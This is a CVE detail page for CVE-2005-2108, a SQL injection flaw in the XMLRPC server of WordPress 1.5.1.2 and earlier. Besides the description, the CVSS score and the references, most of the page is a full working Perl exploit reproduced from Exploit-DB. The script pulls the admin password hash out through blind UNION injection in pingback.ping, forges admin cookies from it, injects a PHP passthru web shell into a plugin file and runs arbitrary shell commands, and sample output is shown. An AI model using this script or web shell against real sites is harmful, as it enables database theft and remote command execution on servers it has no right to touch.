CVE-2005-2108 : Detail

CVE-2005-2108

0.22%V3
Network
2005-07-01
02h00 +00:00
2016-10-17
11h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in XMLRPC server in WordPress 1.5.1.2 and earlier allows remote attackers to execute arbitrary SQL commands via input that is not filtered in the HTTP_RAW_POST_DATA variable, which stores the data in an XML file.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1077

Publication date : 2005-06-29 22h00 +00:00
Author : GulfTech Security
EDB Verified : Yes

#!/usr/bin/perl -w # sorry for the late posting, had to test it. /str0ke ################################################################# # Wordpress 1.5.1.2 Strayhorn // XMLRPC Interface SQL Injection # ################################################################# # By James Bercegay // http://www.gulftech.org/ // June 21 2005 # ################################################################# # Quick and dirty proof of concept that uses the XML RPC server # # vulnerabilities I discovered to extract a password hash & use # # that hash to execute shell commands on the server as httpd :) # ################################################################# # Technical details of WordPress XMLRPC Interface SQL Injection # ################################################################# # The vulnerability exist because all XMLRPC data is taken from # # the HTTP_RAW_POST_DATA variable, and never sanatized properly # # thus leaving the doors open for attack. Also, most if not all # # the functions in xmlrpc.php are vulnerable to similar attacks # ################################################################# # # C:\Documents and Settings\James\Desktop>wp.pl http://pathto/wp admin 1 "id;uname -a;pwd;uptime" # [*] Trying Host http://pathto/wp ... # [+] The XMLRPC server seems to be working # [+] Char 1 is 2 # [+] Char 2 is 1 # [+] Char 3 is 2 # [+] Char 4 is 3 # [+] Char 5 is 2 # [+] Char 6 is f # [+] Char 7 is 2 # [+] Char 8 is 9 # [+] Char 9 is 7 # [+] Char 10 is a # [+] Char 11 is 5 # [+] Char 12 is 7 # [+] Char 13 is a # [+] Char 14 is 5 # [+] Char 15 is a # [+] Char 16 is 7 # [+] Char 17 is 4 # [+] Char 18 is 3 # [+] Char 19 is 8 # [+] Char 20 is 9 # [+] Char 21 is 4 # [+] Char 22 is a # [+] Char 23 is 0 # [+] Char 24 is e # [+] Char 25 is 4 # [+] Char 26 is a # [+] Char 27 is 8 # [+] Char 28 is 0 # [+] Char 29 is 1 # [+] Char 30 is f # [+] Char 31 is c # [+] Char 32 is 3 # [+] Host : http://pathto/wp # [+] User : admin # [+] Hash : 21232f297a57a5a743894a0e4a801fc3 # [*] Attempting to create shell .. # [+] Trying filename hello.php ... # [+] Trying to activate hello.php ... # [+] Trying to execute id;uname -a;pwd;uptime ... # [+] Successfully executed id;uname -a;pwd;uptime # # uid=1979(gulftech) gid=500(customer) groups=500(customer) # FreeBSD example.com 4.10-RELEASE FreeBSD 4.10-RELEASE #0: Tue Jan 1 # 1 22:44:03 PST 2005 [email protected]:/usr/src/sys/compile/EXAMPLE i386 # # /www/htdocs/wp/wp-admin # 8:07AM up 35 days, 20:01, 1 user, load averages: 7.98, 8.24, 8.14 # ################################################################# use LWP::UserAgent; use Digest::MD5 qw(md5_hex); my $ua = new LWP::UserAgent; $ua->agent("Wordpress Hash Grabber v1.0" . $ua->agent); my @char = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"); my $host = $ARGV[0]; # The path to xmlrpc.php my $user = $ARGV[1]; # The target login, default wp user is admin my $post = $ARGV[2]; # Must be a valid pingback or part # of an entry title, very easy to # obtain if you know how to read :) my $exec = $ARGV[3]; # Command to execute my $pref = 'wp_'; # database prefix! my $hash = ''; if ( !$ARGV[2] ) { die("Im Not Psychic ..\n"); } print "[*] Trying Host $host ...\n"; my $res = $ua->get($host.'/xmlrpc.php'); if ( $res->content =~ /XML-RPC server accepts POST requests only/is ) { print "[+] The XMLRPC server seems to be working \n"; } else { print "[!] Something seems to be wrong with the XMLRPC server \n "; # Sloppy way of debugging, remove if you want open(LOG, ">wp_out.html"); print LOG $res->content; exit; } for( $i=1; $i < 33; $i++ ) { for( $j=0; $j < 16; $j++ ) { # oh my! :) my $sql = "<?xml version=\"1.0\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>foobar' UNION SELECT 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 FROM " . $pref . "users WHERE (user_login='$user' AND MID(user_pass,$i,1)='$char[$j]')/*</string></value></param><param><value><string>$host/?p=$post#$post</string></value></param><param><value><string>admin</string></value></param></params></methodCall>"; # Remove the content type so $HTTP_RAW_POST_DATA is # populated. php.net guys, pleeeeaaase fix this! :) my $req = new HTTP::Request POST => $host . "/xmlrpc.php"; $req->content($sql); $res = $ua->request($req); $out = $res->content; if ( $out =~ /The pingback has already been registered/) { $hash .= $char[$j]; print "[+] Char $i is $char[$j]\n"; last; } } if ( length($hash) < 1 ) { # Sloppy way of debugging, remove if you want open(LOG, ">wp_out.html"); print LOG $out; print "[!] $host not vulnerable? Better verify manually!\n"; exit; } if ( $out =~ /<value><int>0<\/int><\/value>/) { print "[!] Invalid post information specified! \n"; exit; } # Probably exploitable, but not by using default SQL query. The # [0]{5} regex may be a bad idea bit ive never seen a md5 thats # got 5 0's at the very beginning of it. if ( $out =~ /different number of columns/is || $hash =~ /([0]{5})/ ) { # Sloppy way of debugging, remove if you want open(LOG, ">wp_out.html"); print LOG $out; print "[!] The database structured has been altered, check manually \n"; exit; } } # Verbose print "[+] Host : $host\n"; print "[+] User : $user\n"; print "[+] Hash : $hash\n"; # We got the hash, so we are guaranteed admin # even if we can not successfully execute! :) print "[*] Attempting to create shell .. \n"; # Here we md5 the passhash, as well as the host # in order to get the cookie hash, and the pass # hash values respectively. my $ckey = md5_hex($host); $hash = md5_hex($hash); # Create the cookie used to make all admin requests my @cookie = ('Referer' => $host.'/wp-admin/plugins.php;','Cookie' => 'wordpressuser_'.$ckey.'='.$user.'; wordpresspass_'.$ckey.'='. $hash); $res = $ua->get($host.'/wp-admin/plugin-editor.php', @cookie); # Let's get the filename from the plugin editor if ( $res->content =~ /<strong>(.*)\.php<\/strong>/i ) { # Seems our request went okay, and we have the filename! my @list = ($1.'.php', 'hello.php', 'markdown.php', 'textile1.php'); my $file; # Make it work one way or another :) foreach $file (@list) { print "[+] Trying filename $file ...\n"; $res = $ua->get($host.'/wp-admin/plugin-editor.php?file='.$file, @cookie); if ( $res->content =~ /<textarea[^>]*>(.*)<\/textarea>/is ) { # This is the file contents my $data = $1; # Quick and dirty way to fix the data recieved # so that it executes and does not cause error $data =~ s/>/>/ig; $data =~ s/</</ig; $data =~ s/"/"/ig; $data =~ s/&/&/ig; # We use the <cmdout> tag to make it easy to grab out command output my $add = ( $data =~ /<cmdout>(.*)<\/cmdout>/is ) ? '': '<cmdout><?php if ( !empty($_REQUEST["cmd"]) ) passthru($_REQUEST["cmd"]); ?></cmdout>'; # Adding our php code to the selected plugin $res = $ua->post($host . "/wp-admin/plugin-editor.php", ['newcontent' => $add.$data, 'action' => 'update', 'file' => $file, 'submit' => 'foobar'], @cookie); # Trying to activate the plugin. If the requests doesn't succeed # then the command execution will fail unless the plugin has had print "[+] Trying to activate $file ... \n"; $res = $ua->get($host.'/wp-admin/plugins.php?action=activate&plugin='.$file , @cookie); # Depending on the plugin this should execute # our command, else we try the file directly! # this works everytime on the default install print "[+] Trying to execute $exec ... \n"; $res = $ua->get($host.'/wp-admin/plugins.php?cmd='.$exec, @cookie); # It seems we have executed our command successfully if ( $res->content =~ /<cmdout>(.*)<\/cmdout>/is ) { # Send results to STDOUT print "[+] Successfully executed $exec\n\n\n"; print $1; exit; } else { # No luck with that particular method, so # we will try to access the modified file print "[!] Couldnt execute command $exec\n"; open(LOG, ">wp_out.html"); print LOG $res->content; # Trying to access the file directly and execute print "[!] Trying to access $file directly!\n"; $res = $ua->get($host.'/wp-content/plugins/'.$file.'?cmd='.$exec, @cookie); # It seems we have executed our command successfully if ( $res->content =~ /<cmdout>(.*)<\/cmdout>/is ) { # Send results to STDOUT print "[+] Successfully executed $exec\n\n\n"; print $1; exit; } else { # No luck, better take a look at things manually print "[!] Couldnt execute command $exec\n"; print "[*] Try $host/wp-content/plugins/$file manually\n"; } } } else { # Unable to get the file contents print "[!] Could not read file $file \n"; open(LOG, ">wp_out.html"); print LOG $res->content . $file; } } } else { # Unable to get the plugin information print "[!] Could Not Get Plugin Information\n"; open(LOG, ">wp_out.html"); print LOG $res->content; } # fin exit; # milw0rm.com [2005-06-30]

Products Mentioned

Configuraton 0

Wordpress>>Wordpress >> Version 1.0

Wordpress>>Wordpress >> Version 1.0.1

Wordpress>>Wordpress >> Version 1.0.2

Wordpress>>Wordpress >> Version 1.2

Wordpress>>Wordpress >> Version 1.5

Wordpress>>Wordpress >> Version 1.5.1

Wordpress>>Wordpress >> Version 1.5.1.2

References

http://secunia.com/advisories/15831
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=112006967221438&w=2
Tags : mailing-list, x_refsource_BUGTRAQ